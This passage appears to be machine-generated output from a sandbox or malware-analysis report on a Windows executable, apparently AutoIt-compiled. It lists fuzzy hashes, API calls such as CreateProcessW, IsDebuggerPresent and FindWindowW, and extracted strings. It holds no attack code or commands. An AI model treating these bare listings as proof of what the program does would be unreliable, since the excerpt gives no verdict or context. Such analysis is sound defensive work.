                                                          • Opcode Fuzzy Hash: c8a54f68c42fcab45e7cd517b1647a991c166fafab58316889a6b7740fdd06f8
                                                          • Instruction Fuzzy Hash: D9116D71500209AFEB208F74DC84AEA3B6EEB15368F205714F974A71D0DB75DC919B60
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00DD6C0C
                                                          • _wcslen.LIBCMT ref: 00DD6C18
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: STOP
                                                          • API String ID: 1256254125-2411985666
                                                          APIs
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                            • Part of subcall function 00DD3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3C12
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DD1C0C
                                                          Strings
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_wcslen
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 624084870-1403004172
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43008,00E4304C), ref: 00E080B1
                                                          • CloseHandle.KERNEL32 ref: 00E080C3
                                                          Strings
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: L0
                                                          • API String ID: 3712363035-3745075247
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: 3, 3, 16, 0
                                                          • API String ID: 176396367-3261555341
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DD0A67
                                                          Strings
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 2030045667-4017498283
                                                          APIs
                                                            • Part of subcall function 00D8F8A8: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D90CF1,?,?,?,00D7100A), ref: 00D8F8AD
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00D7100A), ref: 00D90CF5
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D7100A), ref: 00D90D04
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D90CFF
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 55579361-631824599
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D8E3A1
                                                          Strings
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: 0%$8%
                                                          • API String ID: 1385522511-2949748613
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: %.3d$X64
                                                          • API String ID: 481472006-1077770165
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0229F
                                                          • PostMessageW.USER32(00000000), ref: 00E022A6
                                                            • Part of subcall function 00DDE899: Sleep.KERNEL32 ref: 00DDE911
                                                          Strings
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0225F
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E02272
                                                            • Part of subcall function 00DDE899: Sleep.KERNEL32 ref: 00DDE911
                                                          Strings
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461